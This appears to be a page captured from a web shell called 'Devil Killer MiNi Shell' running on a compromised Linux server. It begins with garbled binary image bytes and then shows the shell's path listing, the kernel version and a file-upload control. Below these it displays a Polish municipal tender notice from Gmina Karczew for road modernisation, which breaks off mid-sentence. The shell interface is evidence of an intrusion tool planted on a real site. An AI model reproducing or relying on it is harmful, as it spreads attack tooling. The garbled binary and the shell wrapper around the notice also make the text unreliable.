JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250715/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250715/0032750901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg gminnych na terenie gminy Karczew </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Karczew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269226</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@karczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.karczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg gminnych na terenie gminy Karczew </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-578e3262-090a-42bd-801d-7d8f308b2cf2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00327509</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://karczew.logintrade.net/zapytania_email,204235,24fd3fea5b63f131798f739252789647.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postepowaniu o udzielenie zamówienia publicznego komunikacja pomiędzy<br/>Zamawiającym a Wykonawcą odbywa się za pośrednictwem dedykowanej platformy pod adresem<br/>https://karczew.logintrade.net/zapytania_email,170866,e65a44cccbd60957bf22a8f6212156f3.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">c)	Ilekroć w niniejszej Specyfikacji Warunków Zamówienia mowa jest o stronie internetowej prowadzonego postępowania lub stronie internetowej, należy przez to rozumieć Platformę przetargową, wskazaną w punkcie 1.1.2 powyżej.<br/>d)	Adres strony internetowej, na której udostępnione będą zmiany i wyjaśnienia treści Specyfikacji Warunków Zamówienia oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia (tożsamy z adresem strony wskazanej w punkcie 1.1.2 powyżej), tj.: <br/>https://karczew.logintrade.net/zapytania_email,204235,24fd3fea5b63f131798f739252789647.html<br/>e)	Regulamin systemu teleinformatycznego dostępny jest pod adresem: https://karczew.logintrade.net/rejestracja/regulamin.html<br/>f)	Szczegółowe instrukcje dla Wykonawców znajdują się na stronie: https://karczew.logintrade.net/rejestracja/instrukcje.html<br/>g)	Rejestracja do systemu teleinformatycznego dostępna jest pod adresem: https://karczew.logintrade.net/rejestracja/rejestracja.html <br/>h)	W celu złożenia oferty przez Wykonawcę rejestracja nie jest obowiązkowa, szczegóły znajdują się pod adresem wskazanym w punkcie 1.1.5 powyżej.<br/>i)	Maksymalny rozmiar przesyłanych plików: 150 MB.<br/>j)	Korzystanie z Platformy przetargowej jest bezpłatne.<br/>k)	Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca tj.: Logintrade S.A., ul. Legnicka 57D, lok. B/J, 54-203 Wrocław. W przypadku ewentualnych problemów technicznych prosimy o kontakt z infolinią techniczną +48 71 787 35 34; e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8:00 ÷ 16:00<br/> Ofertę składa się wyłącznie przez<br/>Platformę przetargową. Ofertę składa się pod rygorem nieważności zgodnie z wyborem Wykonawcy:</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/07/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – Przebudowa dróg gminnych ul. Kochanowskiego i Zaułek w miejscowości Karczewie<br/>1.	Opis przedmiotu zamówienia w odniesieniu do części I – Przebudowa dróg gminnych ul. Kochanowskiego i Zaułek w miejscowości Karczewie<br/>1)	W ramach zamówienia należy dokonać przebudowy drogi gminnej nr 271704 ulicy Zaułek w miejscowości Karczew – odcinek około 91,31 mb oraz drogi gminnej nr 270392 ulicy Kochanowskiego w miejscowości Karczew – odcinek około 372,62. (odcinek od ul. Krasickiego do ul. Hallera)<br/>2)	W ramach zadnia podstawowego należy wykonać:<br/>a)	prace rozbiórkowe na terenie inwestycji<br/>b)	wykonanie robót ziemnych – korytowanie, regulacja istniejącego uzbrojenia<br/>c)	wykonanie odwodnienia zgodnie z projektem,<br/>d)	wykonanie ulepszonego podłoża z gruntu niewysadzinowego, antropogenicznego z rozbiórki istejącej jezdni o nawierzchni tłuczniowej i częściowo dowozu z gruntu naturalnego gr. 25 cm<br/>e)	wykonanie warstwy mrozoodpornej z mieszanki stabilizowanej cementem C1 5/2 zagęszczona do E2≥80 MPa o gr. 20 cm<br/>f)	wykonanie podbudowy z kruszywa łamanego frakcji 0/31,5 mm o średniej gr. 20 cm<br/>g)	wykonanie warstwy wiążącej z betonu asfaltowego AC16W o gr. 6 cm<br/>h)	wykonanie warstwy ścieralnej z betonu asfaltowego AC11S o gr. 4 cm - UWAGA: nawierzchnie należy wykonać całą szerokością <br/>i)	ustawić nowy krawężnik betonowy wystający o wymiarach 15x30x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>j)	ustawić nowy krawężnik betonowy najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>k)	wykonanie pobocza z kruszywa łamanego frakcji 31,5/63 mm o gr. 15 cm<br/>l)	wykonanie zjazdów z kruszywa łamanego frakcji0//31,5 mm o gr. 15 cm<br/>m)	wprowadzenie stałej organizacji ruchu przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej<br/>n)	wykonanie połączeń między warstwowego z emulsji asfaltowej na całej powierzchni<br/>o)	połączenia działek roboczych i połączenia nowej nawierzchni z istniejącą należy uszczelnić masą na bazie bitumu,<br/>p)	wykonawca musi wykonać nawierzchnie jezdni z zachowaniem spadków podłużnych oraz poprzecznych umożliwiających prawidłowy spływ wód opadowych z nawierzchni jezdni, niedopuszczalne jest powstanie zastoisk wody po opadach deszczu spowodowanych złym wyprofilowaniem nawierzchni jezdni <br/>q)	Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej, w skład której wchodzić musi m.in. recepty na masę, sprawozdania z badań, aprobaty techniczne na użyte materiały, dokumentacja fotograficzna, inwentaryzacja powykonawcza, zgłoszenie wprowadzenia stałej organizacji ruchu, oświadczenie itp. <br/>r)	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej przebudowy drogi gminnej ulicy Zaułek w miejscowości Karczew opracowanego przez ARS Projekt <br/>s)	Zadanie realizowane jest na podstawie zaświadczenia o niewniesieniu sprzeciwu przez organ architektoniczno – budowlany na zgłoszone roboty<br/>t)	Wykonawca zobowiązany jest we własnym zakresie do opracowania, zatwierdzenia, a następnie wprowadzenia czasowej organizacji ruchu na czas prowadzenia robót, <br/>u)	Wykonawca zobowiązany jest na 5 dni przed rozpoczęciem robót budowlanych o powiadomieniu mieszkańców o rozpoczęciu robót budowlanych i związanych z tym utrudnieniach<br/>v)	Wykonawca musi prowadzić tak roboty budowlane aby umożliwić mieszkańcom dojazd do posesji, za wyjątkiem wykonania warstwy ścieralnej)<br/>w)	Przed wykonywaniem warstwy ścieralnej wykonawca zobowiązany jest powiadomić pisemnie wszystkich mieszkańców danej ulicy o jej zamknięciu, a co się z tym wiąże brakiem dojazdów ze wskazaniem dnia i godzi utrudnień, <br/>3)	Zamawiający przewiduje Opcje w ramach, której należy wykonać:<br/>a)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów) a od strony jezdni wykonać krawężnik najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15,<br/>b)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>c)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków<br/>4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów) a od strony jezdni wykonać krawężnik najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15,<br/>b)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>c)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – Przebudowa drogi gminnej ulicy Zakątek w miejscowości Karczew<br/>2.	Opis przedmiotu zamówienia w odniesieniu do części II – Przebudowa drogi gminnej ulicy Zakątek w Miejscowości Karczew<br/>1)	W ramach zamówienia należy dokonać przebudowy drogi gminnej nr 271703 ulicy Zakątek w miejscowości Karczew – odcinek około 59 mb<br/>2)	W ramach zadnia na przedmiotowej drodze należy wykonać:<br/>a)	prace rozbiórkowe na terenie inwestycji<br/>b)	wykonanie robót ziemnych – korytowanie, regulacja istniejącego uzbrojenia<br/>c)	wykonanie odwodnienia zgodnie z projektem,<br/>d)	wykonanie warstwy mrozoodpornej z mieszanki stabilizowanej cementem C1 5/2 zagęszczona do E2≥80 MPa o gr. 20 cm<br/>e)	wykonanie podbudowy z kruszywa łamanego frakcji 0/31,5 mm o średniej gr. 20 cm<br/>f)	wykonanie warstwy wiążącej z betonu asfaltowego AC16W o gr. 6 cm<br/>g)	wykonanie warstwy ścieralnej z betonu asfaltowego AC11S o gr. 4 cm - UWAGA: nawierzchnie należy wykonać całą szerokością <br/>h)	wykonanie pobocza z kruszywa łamanego frakcji 31,5/63 mm o gr. 15 cm<br/>i)	wykonanie zjazdów z kruszywa łamanego frakcji0//31,5 mm o gr. 15 cm<br/>j)	wprowadzenie stałej organizacji ruchu przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej<br/>k)	wykonanie połączeń między warstwowego z emulsji asfaltowej na całej powierzchni<br/>l)	połączenia działek roboczych i połączenia nowej nawierzchni z istniejącą należy uszczelnić masą na bazie bitumu,<br/>m)	wykonawca musi wykonać nawierzchnie jezdni z zachowaniem spadków podłużnych oraz poprzecznych umożliwiających prawidłowy spływ wód opadowych z nawierzchni jezdni, niedopuszczalne jest powstanie zastoisk wody po opadach deszczu spowodowanych złym wyprofilowaniem nawierzchni jezdni <br/>n)	Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej, w skład której wchodzić musi m.in. recepty na masę, sprawozdania z badań, aprobaty techniczne na użyte materiały, dokumentacja fotograficzna, inwentaryzacja powykonawcza, zgłoszenie wprowadzenia stałej organizacji ruchu, oświadczenie itp. <br/>o)	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej przebudowy drogi gminnej ulicy Zakątek w miejscowości Karczew opracowanego przez ARS Projekt <br/>p)	Zadanie realizowane jest na podstawie zaświadczenia o niewniesieniu sprzeciwu przez organ architektoniczno – budowlany na zgłoszone roboty<br/>q)	Wykonawca zobowiązany jest we własnym zakresie do opracowania, zatwierdzenia, a następnie wprowadzenia czasowej organizacji ruchu na czas prowadzenia robót, <br/>r)	Wykonawca zobowiązany jest na 5 dni przed rozpoczęciem robót budowlanych o powiadomieniu mieszkańców o rozpoczęciu robót budowlanych i związanych z tym utrudnieniach<br/>s)	Wykonawca musi prowadzić tak roboty budowlane aby umożliwić mieszkańcom dojazd do posesji, za wyjątkiem wykonania warstwy ścieralnej)<br/>t)	Przed wykonywaniem warstwy ścieralnej wykonawca zobowiązany jest powiadomić pisemnie wszystkich mieszkańców danej ulicy o jej zamknięciu, a co się z tym wiąże brakiem dojazdów ze wskazaniem dnia i godzi utrudnień, <br/>3)	Zamawiający przewiduje Opcje w ramach, której należy wykonać:<br/>x)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów) a od strony jezdni wykonać krawężnik najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>a)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>b)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków<br/>4)	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Określenie zakresu robót budowlanych – wykonanie robót polegać będzie na powtórzeniu podobnych robót budowlanych do zamówienia podstawowego, w tym m.in.: roboty drogowe w zakresie wykonania nawierzchni jezdni asfaltowej, oznakowania stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Warunki, na jakich zostaną udzielone te roboty budowlane: umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą na warunkach nie gorszych niż określone w Projektowanych Postanowieniach Umowy (dla zamówienia podstawowego). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> x)	Wykonanie na odcinku zamówienia podstawowego wszystkich zjazdów indywidualnych i publicznych z kostki betonowej typu podwójne T o grubości 8 cm (kolor należy ustalić z Zamawiającym na etapie realizacji)na podsypce betonowo piaskowej po uprzednim obramowaniu wszystkich zjazdów z obrzeża betonowego 12x25x100 cm na ławie z oporem betonowym C12/15 (w dokumentacji wskazane jako projektowana krawędź zjazdów) a od strony jezdni wykonać krawężnik najazdowy o wymiarach 15x22x100 cm na ławie z oporem z betonu cementowego C12/15, <br/>a)	UWAGA: podbudowa z kruszywa łamanego została ujęta w zamówieniu podstawowym <br/>b)	Decyzja o zleceniu zamówienia w ramach opcji zostanie podjęta przez Zamawiającego przed podpisaniem umowy i będzie uzależniona od posiadanych środków <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub 